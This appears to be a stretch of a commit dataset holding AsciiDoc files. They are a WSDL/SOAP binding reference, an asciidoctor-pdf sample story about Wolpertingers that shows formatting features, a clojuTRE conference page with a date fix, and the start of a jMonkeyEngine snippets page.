[small]#(\\http:\/\/schemas.xmlsoap.org\/wsdl\/soap12\/)#.\n* The `soap:binding` sub-element has a `transport` attribute, whose value is typically `\\http:\/\/schemas.xmlsoap.org\/soap\/http`, to indicate that the HTTP binding is chosen as a SOAP binding.\n* The `soap:binding` sub-element has a `style` attribute, whose value may be `document` (default) or `rpc`. [small]#(The `style` may also be set per-operation instead of for a whole `portType`.)#\n* The `binding` element has one `operation` sub-element per operation that is to be reachable by SOAP. That sub-element specifies linking information for the _abstract_ operation with the same name within the related `portType`. Each such `operation` element has a `<soap:operation soapAction=\"uri\"\/>` sub-element that specifies the SOAP action to use to target that operation. Each `operation` also has sub-elements for each of the input, output and faults defined in the corresponding abstract operation, with for each of those a sub-element `soap:body` that, for `rpc` style, specifies a namespace (BP). Unbound parts are discouraged and should be ignored (BP http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#R2209[R2209]{emptyattribute}).\n\nHere is how to interpret these informations (BP).\n\nWith `document` style, there can be at most one message part in a message [small]#(unless `soap:body` `part` attribute is used)#. That part must be defined using the `element` attribute. It appears directly under the SOAP Body element.\n\nWith `rpc` style, each part is a parameter or a return value. Parts must be defined using the `type` attribute. The SOAP Body element will contain an operation wrapper element containing, for each part, a part wrapper element followed by the content of the part: `<opName><part1>\u2026<\/part1><part2>\u2026<\/part2><\/opName>`. The operation wrapper element namespace is the value of the namespace attribute of the `soap:body` element and its local name is either the name of the operation, for a SOAP Request, or the name of the operation suffixed with \u201cResponse\u201d. The `name` and `type` attributes of `part` elements define the local name and type of the corresponding part wrapper. Part wrappers have no namespace.\n\nDocument style is http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#Consistency_of_style_Attribute[encouraged].\n\nBP mandates unique operation signatures, so that an endpoint may identify which operation is invoked based on the input message. The operation signature is the fully qualified name of the child element of the SOAP body [small]#(assuming no wsa:Action SOAP header blocks are used)#.\n\nThe `service` element consists in a set of `port` elements. Each `port` refers to a given `binding` element using a QName.\nA sub-element of `port` gives the SOAP HTTP address to use to call the SOAP web service: `soap:address location=\"uri\"`.\n\n[[refs]]\n== Refs\n* W3C https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315[WSDL 1.1] note; https:\/\/www.w3.org\/Submission\/2006\/SUBM-wsdl11soap12-20060405\/[WSDL 1.1 to SOAP 1.2] link-type\n* WSDL https:\/\/www.w3.org\/TR\/?title=wsdl[Specifications] on W3C\n* Web Services Interoperability (http:\/\/www.ws-i.org\/[WS-I]) Basic Profile (BP) clarifies and modifies WSDL and related specifications to promote interoperability.\n\/\/* BP 2.0 corrected http:\/\/ws-i.org\/profiles\/basic\/1.1\/wsdl-2004-08-24.xsd[WSDL schema] TODO check 2.0 or 1.1?\n\n== Supplementary details\nWhat this document calls a link-type, namely the type of relation between the abstract and the concrete web service descriptions, is usually referred to as a _binding_. This presents risks of confusion with the WSDL `binding` element. Here the word \u201cbinding\u201d is only used to refer to the element.\n\nThe WSDL element `import` can be used to import WSDL documents into other WSDL documents. (The spec also allows to use the WSDL `import` element to import XSD schemas, but this is now discouraged, see http:\/\/www.ws-i.org\/Profiles\/BasicProfile-1.0-2004-04-16.html#refinement16498504[BP 1.0] and later versions. The XSD import mechanism should be preferred.)\n\nIn WSDL 2.0, `portType` is called `interface`, `port` is called `endpoint`.\n\nEach of the operation message (input, \u2026) in a SOAP link-type has a `soap:body` whose `use` must (http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#R2706[BP 2.0], 1.1) be `literal` (or left to the default, `literal`, BP 1.2). (`encoded` is not used any more, see this https:\/\/docs.microsoft.com\/en-us\/previous-versions\/dotnet\/articles\/ms995710(v=msdn.10)[opinion]).\n\nBP 2.0 does not require the sender to set soapAction in the HTTP header nor as part of the Content-Type header. Thus, it may not be relied upon.\n\nAn operation can be classified as: One-way (input only); Request-response (with input, output, and possibly fault messages); or other two types (that this document is not concerned with).\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"1dc07d931e31de452d6dd9d7c387b5e202b65631","subject":"minor rephrasing in chronicles example","message":"minor rephrasing in chronicles example\n","repos":"Hextremist\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf","old_file":"examples\/chronicles-example.adoc","new_file":"examples\/chronicles-example.adoc","new_contents":"= The Dangerous & _Thrilling_ Documentation Chronicles: Based on True Events\nKismet Cam\u00e9l\u00e9on; Lazarus het_Draeke\nv1.0, 2014-01-01: The first incarnation of The Documentation Chronicles.\n:description: This story chronicles the inexplicable hazards and vicious beasts a \\\nteam must conquer and vanquish on their journey to discovering the true power of \\\nOpen Source.\n:doctype: book\n\/\/ Settings:\n:experimental:\n:icons: font\n:listing-caption: Listing\n:sectnums:\n:toc:\n:toclevels: 3\nifdef::backend-pdf[]\n:title-logo-image: image:sample-banner.svg[pdfwidth=4.25in,align=center]\n:source-highlighter: rouge\n\/\/:rouge-style: github\n\/\/:source-highlighter: pygments\n\/\/:pygments-style: tango\nendif::[]\n\/\/ URIs:\n:wolper-uri: http:\/\/en.wikipedia.org\/wiki\/Wolpertinger\n\n[abstract]\n{description}\n\n== It's a City Under Siege\n\nThis journey begins one late Monday afternoon at http:\/\/www.devoxx.be[Devoxx].\nOur team needs coffee, _desperately_, but none of us dare open the theater doors...\n\nDuring the first workshop, a script-happy warlock inadvertently released a legion of Wolpertingers!\nTo leave now would mean *code dismemberment and certain death*.\n\nBehold -> the horror!\n\n.Wolpertinger, stuffed\n[.left.thumb]\nimage::wolpertinger.jpg[Wolpertinger,pdfwidth=50%,link=http:\/\/en.wikipedia.org\/wiki\/Wolpertinger]\n\nYou may not be familiar with these {wolper-uri}[ravenous beasts].\nTrust us, they'll eat your shorts and suck loops from your code.\nIn light of this danger, we've searched high and wide for the security crew's defensive operations manual.\nWe can't find it and the DefOps{empty}footnote:[a portmanteau of \u201cdefensive\u201d and \u201coperations\u201d] werewolves haven't returned from their rendezvous at Bier Central.\nThey've either eaten each other or fallen victim to the Wolpertingers roaming the streets of Antwerp.\nQuick, hit kbd:[Ctrl,Alt,Backspace] or select menu:File[Quit] and let's bail out of here!\n\nWARNING: Working with werewolves leads to howling and trying to train aggressive regular expressions with Pavlovian reinforcement.\n\n_Weak light from the hallway trickled across the theater, chased by a distant scream._\n\n=== Rendezvous Point\n\nCome on, _Bier Central_.\nDid you have to ask?\nIf you beat me there, I'll take a http:\/\/www.sintbernardus.be\/stbernardusabt12.php?l=en[St. Bernardus Abt 12].\n\n[#ravages]\n== The Ravages of Writing\n\nCrystalline XML tags relentlessly bombarded the theater.\n\n.XML tags\n[source,xml]\n----\n<author id=\"1\">\n <personname>\n <firstname>Lazarus<\/firstname>\n <surname>het Draeke<\/surname>\n <\/personname>\n<\/author>\n----\n\nDespite the assault, we were still attempting to draft an example of a defensive operation.\n\n.DefOps Plan\n====\nClick btn:[Download Zip] to download the defensive operation plan bundle.\n\nOMG!\nSomebody please save us now!\nI want my mum...and an extra-large double macchiato, please.\n====\n\nUnfortunaly, Lazarus and I had both come to the conclusion that we weren't going to get out of this without corrupted hardrives if we didn't locate caffeine within the next few hours.\n\n=== A Recipe for Potion That Will Ensure You Win the Hearts of Developers\n\nThis potion for a sample document contains the following ingredients, which are listed in a very random, chaotically nested order.\n\n.Ingredients for Potion that Demystifies Documents\n* all the headings\n** syntax highlighted source code\n*** non-syntax highlighted source code or just a listing block\n* quote block\n** verse block\n*** table with some cell formatting\n**** sequential paragraphs\n***** admonition blocks, but use them sparingly\n*** bullet list with nesting\n** numbered list with nesting\n** definition list\n*** sidebar\n* example block\n** block image (no inline images)\n*** inline formatting in a paragraph\n**** two fresh Burdockian leaves\n***** They must be harvested by the light of the teal moons.\n\nAre you square?\n\n[square]\n* one\n* two\n* three\n\nWhat is there to do?\n\n* [x] Done\n* [ ] Next\n* Who's counting?\n\n==== Searching for Burdockian\n\n.Steps for finding and preparing Burdockian leaves\n. Locate dusty botany\n.. Sneeze\n... Sneeze some more\n. Find section on Burdockian\n.. Review its characteristics\n... Take a picture of the diagram of its leaves\n.... Don't rip out the picture like a troglodyte\n..... Don't do it, I'm watching you\n. Put on your hiking boots\n. Freeze your butt off on the side of a mountain at midnight\n\nLet's skip a few steps and start counting from 10.\n\n[start=10]\n. arabic (10)\n.. loweralpha (a)\n... lowerroman (i)\n... lowerroman (ii)\n... lowerroman (iii)\n... lowerroman (iv)\n.... upperalpha (A)\n. arabic (11)\n\nIt's time for a top 5 list, made using the `reversed` option on an ordered list!\n\n[%reversed]\n. Stone Imperial Russian Stout\n. Pliny the Elder\n. Chimay Grande R\u00e9serve (Blue)\n. St. Bernardus Abt 12\n. Westvleteren 12 (XII)\n\nHow about a list with some terms?\n\n* Fruits\n\nApple::\nThe round fruit of a tree of the rose family, which typically has thin red or green skin and crisp flesh.\nYes, I said _flesh_.\n\nPear::\nA yellowish- or brownish-green edible fruit that is typically narrow at the stalk and wider toward the base, with sweet, slightly gritty flesh.\nMore flesh.\nMmmmm.\n\n* Vegetables\n\nCarrot::\nAn orange-colored root eaten as a vegetable.\nBeware, it's a favorite of the Wolpertinger.\n\n===== Are You Still Here?\n\n.Move, move, move!\n[CAUTION]\n====\nThe Wolpertingers can smell your procrastination.\nIt's not their fault you can't find your boots.\n====\n\n====== Sigh...\n\nTIP: Your boots are in your closet.\n\n== Dawn on the Plateau\n\nLazarus was hanging from the bottom limb of a Burdockian tree, licking the bark.\n\n[quote,Mark Tobey]\nOn pavements and the bark of trees I have found whole worlds.\n\n\"`If there are whole worlds on that bark, he just swallowed them,`\" Kizmet replied.\n\n[verse,The documentation attorneys]\n____\nNo bark was harmed in the making of this potion.\n We're not so sure about a couple ants though.\n\n Nor those worlds...\n\n Crap, I smell an injunction.\n____\n\nWe'd retrieved the leaves, but we'd obviously lost our minds in the process.\n\n[verse]\nRoses are +++<span style=\"color: #FF0000\">red<\/span>+++.\nViolets are +++<span style=\"color: #0000FF\">blue<\/span>+++__-ish__.\n\n== Words Seasoned with Power\n\n_To tame_ the wild wolpertingers we needed to build a *charm*.\nBut **u**ltimate victory could only be won if we divined the *_true name_* of the __war__lock.\n\n\"`What kind of charm?`\" Lazarus asked. \"`An odoriferous one or a mineral one?`\"\nKizmet shrugged. \"`The note from Olaf's desk says '`wormwood and licorice,`' but these could be normal groceries for werewolves.`\"\n\n\"`Well the H~2~O written on the security whiteboard could be part of a shopping list, but I don't think the local bodega also sells e = mc^2^,`\" Lazarus replied.\n\n\"`Wait!`\" Indigo plucked a small vial from her desk's top drawer and held it toward us.\nThe vial's label read '```e = mc^2^ *_the scent of science_* _smells like a genius_```'.\n\n=== Can I Get Some `Code`?\n\n[%hardbreaks]\nSure.\nHave a listing block.\n\n----\nThis is an example of a listing block.\nThe content inside is rendered as <pre> text.\n----\n\nBut I'm not giving you any highlighting shazam just yet.\n\n.What is a listing block?\n****\nLike literal blocks, the content in listing blocks is displayed exactly as you entered it.\nListing block content is rendered as `<pre>` text.\n\nThe `listing` style is applied to an element, such as a paragraph, by setting the `listing` attribute on that element.\n****\n\nLet's get our highlighting on!\n\n<<<\n\nInstall Prawn:\n\n $ gem install prawn\n\nThen create your first PDF document in Ruby!\n\n.Generates a basic PDF document using Prawn\n```ruby\nrequire 'prawn' # <1>\n\nPrawn::Document.generate 'output.pdf' do # <3>\n text 'Hello, World!' # <2>\nend\n```\n<1> Imports Prawn library\n<2> Adds text \u201cHello, World!\u201d to first page\n<3> Writes PDF to [file]_output.pdf_ after executing all statements\n\nHow about some source code that styles code? So meta!\n\n```css\ncode {\n padding: 2px 4px;\n font-size: 90%;\n color: #c7254e;\n white-space: nowrap !important;\n background-color: #f9f2f4;\n border-radius: 4px;\n}\n```\n\nWhere could we go without some Java?\nNaturally, some autosizing is necessary.\n\n[source%autofit,java]\n----\npackage org.javaee7.cdi.events;\n\nimport javax.annotation.PostConstruct;\nimport javax.enterprise.context.SessionScoped;\nimport javax.enterprise.event.Observes;\nimport java.io.Serializable;\nimport java.util.ArrayList;\nimport java.util.Collections;\nimport java.util.List;\nimport javax.ws.rs.*;\n\n\/**\n * This session-scoped bean receives greeting strings from the event bus\n * and provides access to the collection of these greetings via a REST API.\n *\n * @author The Duke\n * @since 1.0\n *\/\n@SessionScoped\npublic class GreetingReceiver implements EventReceiver, Serializable {\n\n private List<String> greetings;\n\n @PostConstruct\n void init() {\n this.greetings = new ArrayList<String>();\n }\n\n void receive(@Observes String greet) {\n this.greetings.add(greet);\n }\n\n @GET\n @Produces(\"application\/json\")\n public List<String> listAll(@QueryParam(\"start\") Integer start, @QueryParam(\"max\") Integer max) {\n int numGreetings = this.greetings.size();\n\n if (numGreetings == 0 || max == 0) {\n return Collections.<String>emptyList();\n }\n\n if (start == null) {\n start = 0;\n }\n\n if (max == null) {\n max = numGreetings;\n }\n\n return this.greetings.subList(start, Math.min(max + start, numGreetings));\n }\n\n}\n----\n\nWe already showed you an XML example in <<ravages>>.\n\nI'll trade you a little table for some of that bark.\n\n[cols=3,frame=topbot,grid=rows]\n|===\n|Name of Column 1 |Name of Column 2 |Name of Column 3\n\n^m|Prefix the `{vbar}` with `{caret}` to center content horizontally\n.<|Prefix the `{vbar}` with a `.` and `<` to align the content to the top of the cell\n>|Prefix the `{vbar}` with `>` to align the content to the right horizontally\n\n3+^.^e|This content spans all three columns (`3{plus}`) and is centered both horizontally (`{caret}`) and vertically (`.{caret}`) within the cell.\n|===\n\nWait.\nWhat?\nWhere is this story going?\n\n`<span>`:: an html tag that makes me crazy\n\nalign:: something I never get going in the right direction.\nAlso has to do with my poor verbal communication skills\n\nfloat::\nstyle::\ndon't make me laugh\n\nDoes anyone have the time?\n\nTg lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\nUt enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.\nExcepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborumj.\n\n== Keeping It Together\n\nOn this page we have nested \"`keep together`\" logic.\nThe combined block will be shifted to the next page if there isn't room available on this one.\n\n[verse]\nFirst,\nwe\nneed\nto\nwaste\nseveral\nlines\nusing\na\nverse\nto\npush\nthe\nnext\nblock\nto\nits\nbreaking\npoint.\n\n[NOTE]\n.What happens if there is both a field and a method with the same name?\n====\nBack to the previous example, suppose that we have both a field and a method with the same name, as in:\n\n.Java class with a field and method that share the same name\n[source,java]\n----\npublic class Foo {\n public String bar;\n\n public String bar() {\n return bar;\n }\n}\n----\n\n*Golo resolves methods first, fields last.*\nHence, the following Golo code will resolve the `bar()` method, not the `bar` field:\n\n.Golo picks the method over the field with the same name\n[source,golo]\n----\nlet foo = Foo()\n\nfoo: bar(\"baz\") # <1>\n\nprintln(foo: bar()) # <2>\n----\n<1> Writes the field\n<2> Calls the `bar()` method\n====\n\n<<<\n\nHere's a preview of how each heading level is rendered.\n\n[discrete]\n= Heading 1 (Level 0)\n\nfiller content\n\n[discrete]\n== Heading 2 (Level 1)\n\nfiller content\n\n[discrete]\n=== Heading 3 (Level 2)\n\nfiller content\n\n[discrete]\n==== Heading 4 (Level 3)\n\nfiller content\n\n[discrete]\n===== Heading 5 (Level 4)\n\nfiller content\n\n[discrete]\n====== Heading 6 (Level 5)\n\nfiller content\n\n---\n\n--\nHere's some content inside an open block.\n--\n\n[appendix]\n== Credits\n\n.Brought to you with icon:heart[] by OpenDevise\n[%header%footer,cols=\"2,2s,3\",grid=rows,frame=topbot,width=75%,caption=]\n|===\n|Name\n|Title\n|Alias\n\n|Sarah White\n|President\n|http:\/\/twitter.com\/carbonfray[@carbonfray]\n\n|Dan Allen\n|Vice President\n|http:\/\/twitter.com\/mojavelinux[@mojavelinux]\n\n3+^.e|Powered by Open Source\n|===\n","old_contents":"= The Dangerous & _Thrilling_ Documentation Chronicles: Based on True Events\nKismet Cam\u00e9l\u00e9on; Lazarus het_Draeke\nv1.0, 2014-01-01: The first incarnation of The Documentation Chronicles.\n:description: This story chronicles the inexplicable hazards and vicious beasts a \\\nteam must conquer and vanquish on their journey to discovering open source's true \\\npower.\n:doctype: book\n\/\/ Settings:\n:experimental:\n:icons: font\n:listing-caption: Listing\n:sectnums:\n:toc:\n:toclevels: 3\nifdef::backend-pdf[]\n:title-logo-image: image:sample-banner.svg[pdfwidth=4.25in,align=center]\n:source-highlighter: rouge\n\/\/:rouge-style: github\n\/\/:source-highlighter: pygments\n\/\/:pygments-style: tango\nendif::[]\n\/\/ URIs:\n:wolper-uri: http:\/\/en.wikipedia.org\/wiki\/Wolpertinger\n\n[abstract]\n{description}\n\n== It's a City Under Siege\n\nThis journey begins one late Monday afternoon at http:\/\/www.devoxx.be[Devoxx].\nOur team needs coffee, _desperately_, but none of us dare open the theater doors...\n\nDuring the first workshop, a script-happy warlock inadvertently released a legion of Wolpertingers!\nTo leave now would mean *code dismemberment and certain death*.\n\nBehold -> the horror!\n\n.Wolpertinger, stuffed\n[.left.thumb]\nimage::wolpertinger.jpg[Wolpertinger,pdfwidth=50%,link=http:\/\/en.wikipedia.org\/wiki\/Wolpertinger]\n\nYou may not be familiar with these {wolper-uri}[ravenous beasts].\nTrust us, they'll eat your shorts and suck loops from your code.\nIn light of this danger, we've searched high and wide for the security crew's defensive operations manual.\nWe can't find it and the DefOps{empty}footnote:[a portmanteau of \u201cdefensive\u201d and \u201coperations\u201d] werewolves haven't returned from their rendezvous at Bier Central.\nThey've either eaten each other or fallen victim to the Wolpertingers roaming the streets of Antwerp.\nQuick, hit kbd:[Ctrl,Alt,Backspace] or select menu:File[Quit] and let's bail out of here!\n\nWARNING: Working with werewolves leads to howling and trying to train aggressive regular expressions with Pavlovian reinforcement.\n\n_Weak light from the hallway trickled across the theater, chased by a distant scream._\n\n=== Rendezvous Point\n\nCome on, _Bier Central_.\nDid you have to ask?\nIf you beat me there, I'll take a http:\/\/www.sintbernardus.be\/stbernardusabt12.php?l=en[St. Bernardus Abt 12].\n\n[#ravages]\n== The Ravages of Writing\n\nCrystalline XML tags relentlessly bombarded the theater.\n\n.XML tags\n[source,xml]\n----\n<author id=\"1\">\n <personname>\n <firstname>Lazarus<\/firstname>\n <surname>het Draeke<\/surname>\n <\/personname>\n<\/author>\n----\n\nDespite the assault, we were still attempting to draft an example of a defensive operation.\n\n.DefOps Plan\n====\nClick btn:[Download Zip] to download the defensive operation plan bundle.\n\nOMG!\nSomebody please save us now!\nI want my mum...and an extra-large double macchiato, please.\n====\n\nUnfortunaly, Lazarus and I had both come to the conclusion that we weren't going to get out of this without corrupted hardrives if we didn't locate caffeine within the next few hours.\n\n=== A Recipe for Potion That Will Ensure You Win the Hearts of Developers\n\nThis potion for a sample document contains the following ingredients, which are listed in a very random, chaotically nested order.\n\n.Ingredients for Potion that Demystifies Documents\n* all the headings\n** syntax highlighted source code\n*** non-syntax highlighted source code or just a listing block\n* quote block\n** verse block\n*** table with some cell formatting\n**** sequential paragraphs\n***** admonition blocks, but use them sparingly\n*** bullet list with nesting\n** numbered list with nesting\n** definition list\n*** sidebar\n* example block\n** block image (no inline images)\n*** inline formatting in a paragraph\n**** two fresh Burdockian leaves\n***** They must be harvested by the light of the teal moons.\n\nAre you square?\n\n[square]\n* one\n* two\n* three\n\nWhat is there to do?\n\n* [x] Done\n* [ ] Next\n* Who's counting?\n\n==== Searching for Burdockian\n\n.Steps for finding and preparing Burdockian leaves\n. Locate dusty botany\n.. Sneeze\n... Sneeze some more\n. Find section on Burdockian\n.. Review its characteristics\n... Take a picture of the diagram of its leaves\n.... Don't rip out the picture like a troglodyte\n..... Don't do it, I'm watching you\n. Put on your hiking boots\n. Freeze your butt off on the side of a mountain at midnight\n\nLet's skip a few steps and start counting from 10.\n\n[start=10]\n. arabic (10)\n.. loweralpha (a)\n... lowerroman (i)\n... lowerroman (ii)\n... lowerroman (iii)\n... lowerroman (iv)\n.... upperalpha (A)\n. arabic (11)\n\nIt's time for a top 5 list, made using the `reversed` option on an ordered list!\n\n[%reversed]\n. Stone Imperial Russian Stout\n. Pliny the Elder\n. Chimay Grande R\u00e9serve (Blue)\n. St. Bernardus Abt 12\n. Westvleteren 12 (XII)\n\nHow about a list with some terms?\n\n* Fruits\n\nApple::\nThe round fruit of a tree of the rose family, which typically has thin red or green skin and crisp flesh.\nYes, I said _flesh_.\n\nPear::\nA yellowish- or brownish-green edible fruit that is typically narrow at the stalk and wider toward the base, with sweet, slightly gritty flesh.\nMore flesh.\nMmmmm.\n\n* Vegetables\n\nCarrot::\nAn orange-colored root eaten as a vegetable.\nBeware, it's a favorite of the Wolpertinger.\n\n===== Are You Still Here?\n\n.Move, move, move!\n[CAUTION]\n====\nThe Wolpertingers can smell your procrastination.\nIt's not their fault you can't find your boots.\n====\n\n====== Sigh...\n\nTIP: Your boots are in your closet.\n\n== Dawn on the Plateau\n\nLazarus was hanging from the bottom limb of a Burdockian tree, licking the bark.\n\n[quote,Mark Tobey]\nOn pavements and the bark of trees I have found whole worlds.\n\n\"`If there are whole worlds on that bark, he just swallowed them,`\" Kizmet replied.\n\n[verse,The documentation attorneys]\n____\nNo bark was harmed in the making of this potion.\n We're not so sure about a couple ants though.\n\n Nor those worlds...\n\n Crap, I smell an injunction.\n____\n\nWe'd retrieved the leaves, but we'd obviously lost our minds in the process.\n\n[verse]\nRoses are +++<span style=\"color: #FF0000\">red<\/span>+++.\nViolets are +++<span style=\"color: #0000FF\">blue<\/span>+++__-ish__.\n\n== Words Seasoned with Power\n\n_To tame_ the wild wolpertingers we needed to build a *charm*.\nBut **u**ltimate victory could only be won if we divined the *_true name_* of the __war__lock.\n\n\"`What kind of charm?`\" Lazarus asked. \"`An odoriferous one or a mineral one?`\"\nKizmet shrugged. \"`The note from Olaf's desk says '`wormwood and licorice,`' but these could be normal groceries for werewolves.`\"\n\n\"`Well the H~2~O written on the security whiteboard could be part of a shopping list, but I don't think the local bodega also sells e = mc^2^,`\" Lazarus replied.\n\n\"`Wait!`\" Indigo plucked a small vial from her desk's top drawer and held it toward us.\nThe vial's label read '```e = mc^2^ *_the scent of science_* _smells like a genius_```'.\n\n=== Can I Get Some `Code`?\n\n[%hardbreaks]\nSure.\nHave a listing block.\n\n----\nThis is an example of a listing block.\nThe content inside is rendered as <pre> text.\n----\n\nBut I'm not giving you any highlighting shazam just yet.\n\n.What is a listing block?\n****\nLike literal blocks, the content in listing blocks is displayed exactly as you entered it.\nListing block content is rendered as `<pre>` text.\n\nThe `listing` style is applied to an element, such as a paragraph, by setting the `listing` attribute on that element.\n****\n\nLet's get our highlighting on!\n\n<<<\n\nInstall Prawn:\n\n $ gem install prawn\n\nThen create your first PDF document in Ruby!\n\n.Generates a basic PDF document using Prawn\n```ruby\nrequire 'prawn' # <1>\n\nPrawn::Document.generate 'output.pdf' do # <3>\n text 'Hello, World!' # <2>\nend\n```\n<1> Imports Prawn library\n<2> Adds text \u201cHello, World!\u201d to first page\n<3> Writes PDF to [file]_output.pdf_ after executing all statements\n\nHow about some source code that styles code? So meta!\n\n```css\ncode {\n padding: 2px 4px;\n font-size: 90%;\n color: #c7254e;\n white-space: nowrap !important;\n background-color: #f9f2f4;\n border-radius: 4px;\n}\n```\n\nWhere could we go without some Java?\nNaturally, some autosizing is necessary.\n\n[source%autofit,java]\n----\npackage org.javaee7.cdi.events;\n\nimport javax.annotation.PostConstruct;\nimport javax.enterprise.context.SessionScoped;\nimport javax.enterprise.event.Observes;\nimport java.io.Serializable;\nimport java.util.ArrayList;\nimport java.util.Collections;\nimport java.util.List;\nimport javax.ws.rs.*;\n\n\/**\n * This session-scoped bean receives greeting strings from the event bus\n * and provides access to the collection of these greetings via a REST API.\n *\n * @author The Duke\n * @since 1.0\n *\/\n@SessionScoped\npublic class GreetingReceiver implements EventReceiver, Serializable {\n\n private List<String> greetings;\n\n @PostConstruct\n void init() {\n this.greetings = new ArrayList<String>();\n }\n\n void receive(@Observes String greet) {\n this.greetings.add(greet);\n }\n\n @GET\n @Produces(\"application\/json\")\n public List<String> listAll(@QueryParam(\"start\") Integer start, @QueryParam(\"max\") Integer max) {\n int numGreetings = this.greetings.size();\n\n if (numGreetings == 0 || max == 0) {\n return Collections.<String>emptyList();\n }\n\n if (start == null) {\n start = 0;\n }\n\n if (max == null) {\n max = numGreetings;\n }\n\n return this.greetings.subList(start, Math.min(max + start, numGreetings));\n }\n\n}\n----\n\nWe already showed you an XML example in <<ravages>>.\n\nI'll trade you a little table for some of that bark.\n\n[cols=3,frame=topbot,grid=rows]\n|===\n|Name of Column 1 |Name of Column 2 |Name of Column 3\n\n^m|Prefix the `{vbar}` with `{caret}` to center content horizontally\n.<|Prefix the `{vbar}` with a `.` and `<` to align the content to the top of the cell\n>|Prefix the `{vbar}` with `>` to align the content to the right horizontally\n\n3+^.^e|This content spans all three columns (`3{plus}`) and is centered both horizontally (`{caret}`) and vertically (`.{caret}`) within the cell.\n|===\n\nWait.\nWhat?\nWhere is this story going?\n\n`<span>`:: an html tag that makes me crazy\n\nalign:: something I never get going in the right direction.\nAlso has to do with my poor verbal communication skills\n\nfloat::\nstyle::\ndon't make me laugh\n\nDoes anyone have the time?\n\nTg lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\nUt enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.\nExcepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborumj.\n\n== Keeping It Together\n\nOn this page we have nested \"`keep together`\" logic.\nThe combined block will be shifted to the next page if there isn't room available on this one.\n\n[verse]\nFirst,\nwe\nneed\nto\nwaste\nseveral\nlines\nusing\na\nverse\nto\npush\nthe\nnext\nblock\nto\nits\nbreaking\npoint.\n\n[NOTE]\n.What happens if there is both a field and a method with the same name?\n====\nBack to the previous example, suppose that we have both a field and a method with the same name, as in:\n\n.Java class with a field and method that share the same name\n[source,java]\n----\npublic class Foo {\n public String bar;\n\n public String bar() {\n return bar;\n }\n}\n----\n\n*Golo resolves methods first, fields last.*\nHence, the following Golo code will resolve the `bar()` method, not the `bar` field:\n\n.Golo picks the method over the field with the same name\n[source,golo]\n----\nlet foo = Foo()\n\nfoo: bar(\"baz\") # <1>\n\nprintln(foo: bar()) # <2>\n----\n<1> Writes the field\n<2> Calls the `bar()` method\n====\n\n<<<\n\nHere's a preview of how each heading level is rendered.\n\n[discrete]\n= Heading 1 (Level 0)\n\nfiller content\n\n[discrete]\n== Heading 2 (Level 1)\n\nfiller content\n\n[discrete]\n=== Heading 3 (Level 2)\n\nfiller content\n\n[discrete]\n==== Heading 4 (Level 3)\n\nfiller content\n\n[discrete]\n===== Heading 5 (Level 4)\n\nfiller content\n\n[discrete]\n====== Heading 6 (Level 5)\n\nfiller content\n\n---\n\n--\nHere's some content inside an open block.\n--\n\n[appendix]\n== Credits\n\n.Brought to you with icon:heart[] by OpenDevise\n[%header%footer,cols=\"2,2s,3\",grid=rows,frame=topbot,width=75%,caption=]\n|===\n|Name\n|Title\n|Alias\n\n|Sarah White\n|President\n|http:\/\/twitter.com\/carbonfray[@carbonfray]\n\n|Dan Allen\n|Vice President\n|http:\/\/twitter.com\/mojavelinux[@mojavelinux]\n\n3+^.e|Powered by Open Source\n|===\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7df3acd7217e17f7ee1214e967907d963fd0d42a","subject":"Fix type on Clojutre start date","message":"Fix type on Clojutre start date\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojutre.adoc","new_file":"content\/events\/2017\/clojutre.adoc","new_contents":"= clojuTRE\nclojuTRE\n2017-09-02\n:jbake-type: event\n:jbake-edition: 2017\n:jbake-link: http:\/\/clojutre.org\/2017\/\n:jbake-location: Tampere, Finland\n:jbake-start: 2017-09-02\n:jbake-end: 2017-09-02\n\nclojuTRE is a Clojure conference organized by http:\/\/www.metosin.fi\/[Metosin]. The event has single track, late start, short talks (20 minutes and 5 minutes Q&A) and a funky after party for networking, discussions and draft beer. We welcome both newbies and seasoned Clojurists.\n\n\n","old_contents":"= clojuTRE\nclojuTRE\n2017-09-02\n:jbake-type: event\n:jbake-edition: 2017\n:jbake-link: http:\/\/clojutre.org\/2017\/\n:jbake-location: Tampere, Finland\n:jbake-start: 2017-09-92\n:jbake-end: 2017-09-02\n\nclojuTRE is a free Clojure conference organized by http:\/\/www.metosin.fi\/[Metosin]. The event has single track, late start, short talks (20 minutes and 5 minutes Q&A) and a funky after party for networking, discussions and draft beer. We welcome both newbies and seasoned Clojurists.\n\n\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"16f8a9b94067be7b979de8f4af4ebafab12aaeeb","subject":"updated snippets","message":"updated snippets\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/ROOT\/pages\/wiki\/atom_snippets.adoc","new_file":"docs\/modules\/ROOT\/pages\/wiki\/atom_snippets.adoc","new_contents":"# Your snippets\n#\n# Atom snippets allow you to enter a simple prefix in the editor and hit tab to\n# expand the prefix into a larger code block with templated values.\n#\n# You can create a new snippet in this file by typing 